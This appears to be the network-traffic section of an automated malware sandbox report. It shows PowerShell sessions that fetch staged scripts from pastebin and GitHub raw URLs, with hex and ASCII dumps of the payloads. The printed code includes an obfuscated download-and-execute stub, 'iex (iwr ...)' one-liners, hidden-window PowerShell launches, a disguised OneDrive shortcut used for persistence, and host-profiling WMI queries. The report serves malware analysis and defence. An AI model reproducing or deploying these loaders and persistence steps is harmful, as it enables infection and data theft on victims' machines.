                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:08:30.254349947 CEST472INHTTP/1.1 301 Moved Permanently
                                            Date: Tue, 15 Oct 2024 14:08:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 167
                                            Connection: keep-alive
                                            Cache-Control: max-age=3600
                                            Expires: Tue, 15 Oct 2024 15:08:30 GMT
                                            Location: https://pastebin.com/raw/sA04Mwk2
                                            Server: cloudflare
                                            CF-RAY: 8d3061acae874772-DFW
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.849711185.199.110.133805632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:08:31.087018967 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:08:31.690565109 CEST541INHTTP/1.1 301 Moved Permanently
                                            Connection: close
                                            Content-Length: 0
                                            Server: Varnish
                                            Retry-After: 0
                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:31 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdfw8210054-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001312.631755,VS0,VE0
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            Expires: Tue, 15 Oct 2024 14:13:31 GMT
                                            Vary: Authorization,Accept-Encoding


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.849714104.20.4.235805336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:08:37.423155069 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:08:38.044130087 CEST472INHTTP/1.1 301 Moved Permanently
                                            Date: Tue, 15 Oct 2024 14:08:37 GMT
                                            Content-Type: text/html
                                            Content-Length: 167
                                            Connection: keep-alive
                                            Cache-Control: max-age=3600
                                            Expires: Tue, 15 Oct 2024 15:08:37 GMT
                                            Location: https://pastebin.com/raw/sA04Mwk2
                                            Server: cloudflare
                                            CF-RAY: 8d3061dd5f2c2e6c-DFW
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.849716185.199.110.133805336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:08:39.162990093 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:08:39.761147022 CEST541INHTTP/1.1 301 Moved Permanently
                                            Connection: close
                                            Content-Length: 0
                                            Server: Varnish
                                            Retry-After: 0
                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:39 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdal2120094-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001320.701833,VS0,VE0
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            Expires: Tue, 15 Oct 2024 14:13:39 GMT
                                            Vary: Authorization,Accept-Encoding


                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.849705185.199.110.1334433364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:08:11 UTC231OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:12 UTC900INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Length: 7088
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "6e4c41fcadb09e4c44f95bcd21966ae888aebf2d5f8b0bcd34ef015521114ea0"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: AC22:294C14:83F2F0:907E59:670E774B
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:11 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdfw8210144-DFW
                                            X-Cache: MISS
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001292.922972,VS0,VE75
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: b9e0ec7714768b6af4c45549587365f703e829f1
                                            Expires: Tue, 15 Oct 2024 14:13:11 GMT
                                            Source-Age: 0
                                            2024-10-15 14:08:12 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 0a 23 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 24 65 6e 76 3a 74 6d 70 5c 44 72 69 76 65 72 44 69 61 67 2e 64 6c 6c 22 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 0a 24 63 75 72 72 65 6e 74 50 61 74 68 20 3d 20 5b 53 79 73 74 65 6d 2e 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 22 50 41 54 48 22 2c 20 22 55 73 65 72 22 29 0a 24 6e 65 77 50 61 74 68 20 3d 20 24 63
                                            Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
                                            2024-10-15 14:08:12 UTC1378INData Raw: 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 34 34 2c 34 32 2c 34 31 2c 38 39 2c 38 2c 31 38 36 2c 34 36 2c 30 2c 30 2c 30 2c 32 34 36 2c 32 35 2c 30 2c 30 2c 30 2c 30 2c 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 32 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 34 36 2c 32 33 38 2c 32 38 2c 31 2c 38 37 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 31 35 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 39 30 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 33 36 2c 38 39 2c 31 30 34 2c 31 38 33 2c 31 36 2c 30 2c 38 33 2c 31 32 31 2c 31 31 35 2c 31 31 36 2c 31 30 31 2c 31 30 39 2c 35 31 2c 35 30 2c 30 2c 30 2c 36 36 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34
                                            Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
                                            2024-10-15 14:08:12 UTC1378INData Raw: 34 37 2c 30 2c 39 39 2c 30 2c 33 32 2c 30 2c 33 34 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 39 39 2c 30 2c 31 31 31 2c 30 2c 31 30 39 2c 30 2c 31 30 39 2c 30 2c 39 37 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 33 32 2c 30 2c 31 31 32 2c 30 2c 31 31 31 2c 30 2c 31 31 39 2c 30 2c 31 30 31 2c 30 2c 31 31 34 2c 30 2c 31 31 35 2c 30 2c 31 30 34 2c 30 2c 31 30 31 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 34 35 2c 30 2c 31 31 39 2c 30 2c 31 30 35 2c 30 2c 31 31 30 2c 30 2c 31 30 30 2c 30 2c 31 31 31
                                            Data Ascii: 47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111
                                            2024-10-15 14:08:12 UTC1378INData Raw: 31 30 2c 32 33 39 2c 31 37 2c 31 35 30 2c 31 39 34 2c 32 31 32 2c 32 31 36 2c 38 33 2c 31 33 33 2c 32 34 2c 31 37 2c 37 33 2c 32 2c 30 2c 30 2c 39 2c 30 2c 30 2c 31 36 30 2c 38 39 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 32 33 37 2c 34 38 2c 31 38 39 2c 32 31 38 2c 36 37 2c 30 2c 31 33 37 2c 37 31 2c 31 36 37 2c 32 34 38 2c 32 30 38 2c 31 39 2c 31 36 34 2c 31 31 35 2c 31 30 32 2c 33 34 2c 36 31 2c 30 2c 30 2c 30 2c 31 30 30 2c 30 2c 30 2c 30 2c 30 2c 33 31 2c 30 2c 30 2c 30 2c 32 32 2c 30 2c 30 2c 30 2c 38 33 2c 30 2c 31 32 31 2c 30 2c 31 31 35 2c 30 2c 31 31 36 2c 30 2c 31 30 31 2c 30 2c 31 30 39 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 33 32 2c 30 2c 34 30 2c 30 2c 36 37 2c 30 2c 35 38 2c 30 2c 39 32 2c 30 2c 38 37 2c 30 2c 31 30 35 2c 30
                                            Data Ascii: 10,239,17,150,194,212,216,83,133,24,17,73,2,0,0,9,0,0,160,89,0,0,0,49,83,80,83,237,48,189,218,67,0,137,71,167,248,208,19,164,115,102,34,61,0,0,0,100,0,0,0,0,31,0,0,0,22,0,0,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,40,0,67,0,58,0,92,0,87,0,105,0
                                            2024-10-15 14:08:12 UTC1378INData Raw: 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 35 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 31 37 37 2c 32 32 2c 31 30 39 2c 36 38 2c 31 37 33 2c 31 34 31 2c 31 31 32 2c 37 32 2c 31 36 37 2c 37 32 2c 36 34 2c 34 36 2c 31 36 34 2c 36 31 2c 31 32 30 2c 31 34 30 2c 32 39 2c 30 2c 30 2c 30 2c 31 30 34 2c 30 2c 30 2c 30 2c 30 2c 37 32 2c 30 2c 30 2c 30 2c 31 32 37 2c 31 30 35 2c 31 39 34 2c 32 32 34 2c 32 31 37 2c 38 38 2c 32 34 38 2c 37 35 2c 31 33 38 2c 32 35 32 2c 32 36 2c 36 30 2c 36 36 2c 34 39 2c 34 2c 37 32 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 29 0a 24 72 65 63 6f 6e 73 74 72 75
                                            Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
                                            2024-10-15 14:08:12 UTC198INData Raw: 74 70 75 74 20 22 46 61 69 6c 65 64 20 74 6f 20 73 65 6e 64 20 6d 65 73 73 61 67 65 2e 20 45 72 72 6f 72 3a 20 24 5f 22 0a 7d 0a 23 73 74 61 72 74 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 20 2d 61 72 67 73 20 27 69 65 78 20 28 69 77 72 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 5f 70 79 6c 64 2e 74 78 74 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 27 0a 0a 7d 0a
                                            Data Ascii: tput "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.849710104.20.4.2354435632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:08:30 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:31 UTC397INHTTP/1.1 200 OK
                                            Date: Tue, 15 Oct 2024 14:08:30 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1;mode=block
                                            cache-control: public, max-age=1801
                                            CF-Cache-Status: HIT
                                            Age: 960
                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                            Server: cloudflare
                                            CF-RAY: 8d3061b198b06c50-DFW
                                            2024-10-15 14:08:31 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                            2024-10-15 14:08:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.849712185.199.110.1334435632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:08:32 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:32 UTC901INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Length: 7508
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:32 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdfw8210177-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001312.389066,VS0,VE92
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 773c73a8812e505d2f5ce1604fa1e900be02fa6b
                                            Expires: Tue, 15 Oct 2024 14:13:32 GMT
                                            Source-Age: 0
                                            2024-10-15 14:08:32 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                            2024-10-15 14:08:32 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                            2024-10-15 14:08:32 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                            2024-10-15 14:08:32 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                            2024-10-15 14:08:32 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
